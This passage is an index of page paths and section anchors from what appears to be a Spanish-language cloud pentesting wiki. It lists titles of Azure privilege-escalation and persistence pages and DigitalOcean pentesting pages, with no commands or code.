rivesc/index.html#microsoftdirectoryapplicationscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsmyorganizationcredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#service-principals","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalssynchronizationcredentialsmanage","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsdisable-y-enable","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#grupos","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsmembersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsdynamicmembershipruleupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#privesc-de-grupos-dinámicos","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#usuarios","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryuserspasswordupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryusersbasicupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#políticas-de-acceso-condicional-y-bypass-de-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#dispositivos","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredusersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicelocalcredentialspasswordread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#bitlockerkeys","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorybitlockerkeyskeyread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#otros-permisos-interesantes-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#az---políticas-de-acceso-condicional-y-bypass-de-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#información-básica","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#enumeración","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#bypass-de-políticas-de-acceso-condicional","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#plataformas-de-dispositivos---condición-de-dispositivo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ubicaciones-países-rangos-de-ip---condición-de-dispositivo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#aplicaciones-en-la-nube","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#otras-elusiones-de-az-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#tono-de-llamada","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#dispositivos-compatibles","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#herramientas","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#azureappssweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#roadrecon","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#invoke-mfasweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ropci","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#donkeytoken","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#referencias","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#az---dynamic-groups-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#información-básica","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#ejemplo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#referencias","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#az---functions-app-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#function-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#lecturaescritura-de-bucket","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostlistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostfunctionkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostmasterkeywrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostsystemkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction-microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitespublishxmlaction-microsoftwebsitesbasicpublishingcredentialspolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionstokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesfunctionspropertiesread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfiglistaction-microsoftwebsitesread-microsoftwebsitesconfiglistaction-microsoftwebsitesconfigread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction-microsoftwebsitesread-microsoftwebsitesoperationresultsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#depuración-remota","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#cambiar-el-repositorio-de-github","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#az---key-vault-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#azure-key-vault","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#microsoftkeyvaultvaultswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#modificar-restricciones-de-red","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#az---logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction--microsoftlogicworkflowstriggersrunaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowstriggerslistcallbackurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftwebsitesread-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsiteswrite-microsoftwebsitesconfiglistaction--microsoftwebsitesstartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#az---mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread--microsoftdbformysqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftdbformysqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbformysqlflexibleserversadministratorswrite--microsoftdbformysqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#az---postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftdbforpostgresqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbforpostgresqlflexibleserversadministratorswrite--microsoftdbforpostgresqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#az---queue-storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#queue","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#acción-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#referencias","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#az---service-bus-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#service-bus","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleslistkeysaction-o-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespaceswrite--microsoftservicebusnamespacesread-si-se-usa-az-cli","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#enviar-mensajes-con-claves-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-o-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#recibir-con-claves-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-o-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#enviar-mensajes-dataactions-microsoftservicebusnamespacesmessagessendaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#recibir-mensajes-dataactions-microsoftservicebusnamespacesmessagesreceiveaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#referencias","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#az---aplicaciones-web-estáticas-post-explotación","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#azure-aplicaciones-web-estáticas","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitessnippetswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#leer-credenciales-de-terceros-configuradas","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#sobrescribir-archivo---sobrescribir-rutas-html-js","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesresetapikeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitescreateuserinvitationaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#pull-requests","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#az---storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#blobs-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsblobservicescontainersimmutabilitypolicieswrite--microsoftstoragestorageaccountsblobservicescontainersimmutabilitypoliciesdelete","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#privesc-específico-de-comparticiones-de-archivos","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicestakeownershipaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesmodifypermissionsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesactassuperuseraction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocaluserswrite-microsoftstoragestorageaccountslocalusersread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocalusersregeneratepasswordaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsrestoreblobrangesaction-microsoftstoragestorageaccountsblobservicescontainersread-microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicessharesrestoreaction--microsoftstoragestorageaccountsread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#otros-permisos-interesantes-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#referencias","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#az---sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversread--microsoftsqlserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversipv6firewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversadministratorswrite--microsoftsqlserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversazureadonlyauthenticationswrite--microsoftsqlserversazureadonlyauthenticationsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversdatabasesdatamaskingpolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#remove-row-level-security","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#az---virtual-desktop-privesx","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#azure-virtual-desktop-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftdesktopvirtualizationhostpoolsretrieveregistrationtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftauthorizationroleassignmentsread-microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#az---máquinas-virtuales-y-privesc-de-red","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#vms-y-red","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputediskswrite-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputevirtualmachineswrite-microsoftcomputegalleriesapplicationswrite-microsoftcomputegalleriesapplicationsversionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesruncommandaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginasadminaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftresourcesdeploymentswrite-microsoftnetworkvirtualnetworkswrite-microsoftnetworknetworksecuritygroupswrite-microsoftnetworknetworksecuritygroupsjoinaction-microsoftnetworkpublicipaddresseswrite-microsoftnetworkpublicipaddressesjoinaction-microsoftnetworknetworkinterfaceswrite-microsoftcomputevirtualmachineswrite-microsoftnetworkvirtualnetworkssubnetsjoinaction-microsoftnetworknetworkinterfacesjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesread-microsoftcomputevirtualmachineswrite-microsoftcomputevirtualmachinesextensionsread-microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftcomputevirtualmachinesread-microsoftcomputedisksread-microsoftnetworknetworkinterfacesread-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputediskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#todo-microsoftcomputevirtualmachineswacloginasadminaction","pentesting-cloud/azure-security/az-persistence/index.html#az---persistencia","pentesting-cloud/azure-security/az-persistence/index.html#aplicación-oauth","pentesting-cloud/azure-security/az-persistence/index.html#aplicaciones-y-principales-de-servicio","pentesting-cloud/azure-security/az-persistence/index.html#federación---certificado-de-firma-de-token","pentesting-cloud/azure-security/az-persistence/index.html#federación---dominio-de-confianza","pentesting-cloud/azure-security/az-persistence/index.html#referencias","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#az---persistencia-de-cuentas-de-automatización","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#privesc-de-almacenamiento","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#puerta-trasera-en-runbook-existente","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#horarios-y-webhooks","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#malware-dentro-de-una-vm-utilizada-en-un-grupo-de-trabajadores-híbridos","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#paquetes-de-entorno-personalizados","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#compromiso-de-repositorios-externos","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#az---cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#persistencia-en-cloud-shell","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#az---logic-apps-persistence","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#logic-apps","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#técnicas-comunes-de-persistencia","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#az---sql-persistence","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#sql","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#técnicas-comunes-de-persistencia","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#az---persistencia-de-almacenamiento-en-cola","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#cola","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#acciones-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#referencias","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#az---vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#persistencia-de-vms","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#aplicaciones-de-vm-extensiones-e-imágenes-de-puerta-trasera","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#instancias-de-puerta-trasera","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#az---almacenamiento-de-persistencia","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#privesc-de-almacenamiento","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#trucos-comunes","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsblobservicescontainersupdate--microsoftstoragestorageaccountsblobservicesdeletepolicywrite","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-device-registration.html#az---device-registration","pentesting-cloud/azure-security/az-device-registration.html#información-básica","pentesting-cloud/azure-security/az-device-registration.html#tpm---trusted-platform-module","pentesting-cloud/azure-security/az-device-registration.html#registrando-un-dispositivo-con-tokens-sso","pentesting-cloud/azure-security/az-device-registration.html#sobrescribiendo-un-ticket-de-dispositivo","pentesting-cloud/azure-security/az-device-registration.html#sobrescribir-la-clave-whfb","pentesting-cloud/azure-security/az-device-registration.html#referencias","pentesting-cloud/digital-ocean-pentesting/index.html#digital-ocean-pentesting","pentesting-cloud/digital-ocean-pentesting/index.html#información-básica","pentesting-cloud/digital-ocean-pentesting/index.html#enumeración-básica","pentesting-cloud/digital-ocean-pentesting/index.html#ssrf","pentesting-cloud/digital-ocean-pentesting/index.html#proyectos","pentesting-cloud/digital-ocean-pentesting/index.html#whoami","pentesting-cloud/digital-ocean-pentesting/index.html#enumeración-de-servicios","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#do---información-básica","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#principales-diferencias-con-aws","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#jerarquía","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#usuario","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#equipo","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#proyecto","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#permisos","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#equipo-1","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#roles","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#acceso","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#nombre-de-usuario--contraseña-mfa","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#claves-api","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#claves-de-acceso-a-spaces","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#aplicación-oauth","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#claves-ssh","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#token-de-autenticación-de-funciones","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#registros","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#registros-de-usuario","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#registros-de-equipo","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#referencias","pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.html#do---permisos-para-un-pentest","pentesting-cloud/digital-ocean-pentesting/do-services/index.html#do---servicios","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#do---apps","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#enumeración","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#rce-y-variables-de-entorno-encriptadas","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#do---container-registry","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#conexión","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#enumeración","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#do---bases-de-datos","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#detalles-de-conexiones","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#enumeración","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#do---droplets","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#autenticación","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#enumeración","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#rce","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#do---functions","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#activadores","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#enumeración","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#do---images","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#enumeración","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#do---kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#información-básica","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#digitalocean-kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#conexión","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#enumeración","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#do---networking","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#dominios","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#ips-reservados","pentesting-cloud/digital-ocean-pentesting/do-s